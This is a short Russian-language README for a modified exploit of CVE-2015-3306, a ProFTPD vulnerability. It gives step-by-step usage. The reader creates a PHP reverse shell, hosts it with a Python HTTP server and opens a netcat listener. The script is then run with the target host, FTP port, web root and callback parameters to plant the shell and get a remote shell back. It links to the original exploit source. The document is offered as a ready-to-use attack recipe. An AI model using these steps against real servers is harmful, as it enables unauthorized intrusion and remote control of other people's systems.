Измененный эксплойт CVE-2015-3306
Как использовать
- Создайте обратную оболочку на PHP
- Запустите сервер для хостинга оболочки в той же директории (python3 -m http.server)
- Запустите слушатель netcat на локальном порту по вашему выбору, пример: (nc -nlvp [порт по выбору])
- Запустите пример эксплойта, приведенный ниже (python3 modified_CVE_2015_3306.py --host [удаленный хост] --port [скорее всего порт 21] --path [/var/www или /var/www/html] --shell [имя php оболочки] --lhost [порт слушателя netcat] --server_port [порт сервера, хостирующего оболочку]

Исходный код оригинального эксплойта: https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py